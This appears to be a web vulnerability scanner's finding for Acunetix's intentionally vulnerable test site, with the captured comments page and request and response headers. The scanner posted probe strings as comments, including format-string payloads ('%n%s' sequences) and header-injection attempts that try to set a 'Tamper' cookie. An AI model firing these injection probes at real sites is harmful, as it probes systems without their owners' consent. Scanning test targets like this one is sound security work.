src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:11 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:11 AM</DIV><DIV class="CommentText">ZAP</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:11 AM</DIV><DIV class="CommentText">ZAP%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s </DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:11 AM</DIV><DIV class="CommentText">ZAP %1!s%2!s%3!s%4!s%5!s%6!s%7!s%8!s%9!s%10!s%11!s%12!s%13!s%14!s%15!s%16!s%17!s%18!s%19!s%20!s%21!n%22!n%23!n%24!n%25!n%26!n%27!n%28!n%29!n%30!n%31!n%32!n%33!n%34!n%35!n%36!n%37!n%38!n%39!n%40!n </DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:11 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:11 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:11 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:34 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:06 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:37 AM</DIV><DIV class="CommentText">\|</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:37 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:38 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:19 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:19 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:19 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:19 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:19 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:20 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:20 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:20 AM</DIV><DIV class="CommentText">Set-cookie: Tamper=477b294b-04f8-47aa-b86e-f54c84dfe7a7</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:20 AM</DIV><DIV class="CommentText">any Set-cookie: Tamper=477b294b-04f8-47aa-b86e-f54c84dfe7a7</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:20 AM</DIV><DIV class="CommentText">any? Set-cookie: Tamper=477b294b-04f8-47aa-b86e-f54c84dfe7a7</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:20 AM</DIV><DIV class="CommentText">any Set-cookie: Tamper=477b294b-04f8-47aa-b86e-f54c84dfe7a7</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:20 AM</DIV><DIV class="CommentText">any? Set-cookie: Tamper=477b294b-04f8-47aa-b86e-f54c84dfe7a7</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:20 AM</DIV><DIV class="CommentText">any Set-cookie: Tamper=477b294b-04f8-47aa-b86e-f54c84dfe7a7 </DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:21 AM</DIV><DIV class="CommentText">any? Set-cookie: Tamper=477b294b-04f8-47aa-b86e-f54c84dfe7a7 </DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:21 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:22 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:35 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:35 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:36 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:36 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:36 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:36 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:36 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:36 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:38 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:21 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:21 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:21 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:21 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:21 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:56 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:56 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:56 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:56 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> </table> </div> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <textarea name="tbComment" rows="2" cols="20" id="tbComment" class="CommentTA"></textarea> <input type="submit" name="btnSend" value="Send comment" id="btnSend" /></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/Comments.aspx?id=0
Method	GET
Parameter	Header User-Agent
Attack	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3739.0 Safari/537.36 Edg/75.0.109.0
Evidence
Show / hide Request and Response
Request Header - size: 530 bytes.	GET http://testaspnet.vulnweb.com/Comments.aspx?id=0 HTTP/1.1 Host: testaspnet.vulnweb.com user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3739.0 Safari/537.36 Edg/75.0.109.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: keep-alive Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?id=0 Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 0 bytes.
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:51:22 GMT Content-Length: 55888
Response Body - size: 55,888 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>Comments</title> <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1"> <meta name="CODE_LANGUAGE" Content="C#"> <meta name="vs_defaultClientScript" content="JavaScript"> <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="Comments.aspx?id=0" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="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